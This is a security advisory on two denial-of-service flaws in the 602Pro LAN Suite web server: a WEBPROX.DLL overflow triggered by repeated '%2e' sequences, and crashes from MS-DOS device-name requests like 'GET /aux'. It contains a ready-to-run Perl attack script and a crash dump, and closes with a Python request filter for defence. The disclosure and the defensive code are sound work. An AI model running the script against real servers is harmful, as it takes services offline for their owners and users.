
602Pro LAN Suite WEBPROX.DLL Buffer Overflow

    602Pro Lansuite


    602Pro Lansuite 2000a 1.0.34 - prior


    'nitr0s' found the following.  There are 2 problems: the first is
    a buffer overflow in WEBPROX.DLL and the other relates to MS-DOS
    device files.  Credit should be given to Peter Grundl, who made
    nitr0s think of trying the same problem that he found in the
    Alt-N Technologies MDaemon WebConfiguration feature, which also
    affects Xitami Webserver 2.4b5 and probably a whole load of other
    Windows server programs.

    Connect to the webserver and send the following request:

        GET /%2e%2e%2e%2e.... /HTTP/1.0

    where %2e is repeated over 157 times.

    Depending on how many times %2e or [.] is sent, the server will
    exit, displaying the following error:

        LANSUITE caused an invalid page fault in
        module WEBPROX.DLL at 015f:008a1326.
        EAX=0000000a CS=015f EIP=008a1326
        EBX=00000008 SS=0167 ESP=05202848
        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
        Bytes at CS:EIP:
        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
        Stack dump:
        052029dc 00862e9a 0000000a 334f2b1f 000000fa
        81623ff0 81648e38 00000008 bff7b317 018d0000
        00000000 018d1650 018d1650 0520ace7 018d164c

    The other problem is with requests for MS-DOS device files.  Send
    the following request to the webserver on port 80:

        GET /aux

    The code:

    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
    # Malformed GET request
    use Getopt::Std;
    use Socket;
    getopts('s:', \%args);
    $foo = "%2e";
    $number = "160";
    $data .= $foo x $number;
    $serv = $args{s};
    $port =  80;
    $buf = "GET /$data /HTTP/1.0\r\n\r\n";
    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    print("Data has been successfully sent to $serv\n");
    sub usage {die("\n\n$0 -s <server>\n\n");}


    Not sure what build nitr0s tried, but something similar was  found
    in the past so please take a look at:

    As for the second problem, that one is OS related.  Filtering
    could help here anyway.
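
    The filtering suggested above, sketched as an added example (not
    code from the advisory or the vendor): a request-line check that
    rejects long dot runs, whether sent as %2e or [.], and MS-DOS
    device names such as AUX.  The function name, the thresholds and
    the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names; legacy Win32 path handling resolves them
# in any directory.
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{p}{n}" for p in ("COM", "LPT") for n in range(1, 10)
}
MAX_DOT_RUN = 2     # assumption: ".." is the longest dot run a sane path needs
MAX_PATH_LEN = 255  # assumption: cap chosen for this sketch, tune per server


def check_request_line(line):
    """Return reasons to reject an HTTP request line (empty list = pass)."""
    parts = line.strip().split(" ")
    if len(parts) < 2 or not parts[1].startswith("/"):
        return ["malformed request line"]
    raw = parts[1].split("?", 1)[0]
    path = unquote(raw)  # so "%2e" and "." are judged alike
    reasons = []
    if len(raw) > MAX_PATH_LEN:
        reasons.append("path too long")
    longest = max((len(run) for run in re.findall(r"\.+", path)), default=0)
    if longest > MAX_DOT_RUN:
        reasons.append(f"dot run of {longest}")
    for segment in re.split(r"[/\\]", path):
        # The extension does not matter here: "aux.txt" still names AUX.
        stem = segment.split(".", 1)[0].rstrip(" :").upper()
        if stem in DOS_DEVICES:
            reasons.append(f"device name {stem}")
    return reasons


# Constructed sample request lines, not captured traffic.
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /" + "%2e" * 160 + " /HTTP/1.0",
    "GET /aux",
    "GET /docs/Aux.txt HTTP/1.0",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_request_line(sample) or "ok", "<-", sample[:40])
```

    A check of this kind belongs in front of the server (reverse
    proxy or filtering gateway), so the request is dropped before
    WEBPROX.DLL or the OS file layer ever parses the path.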
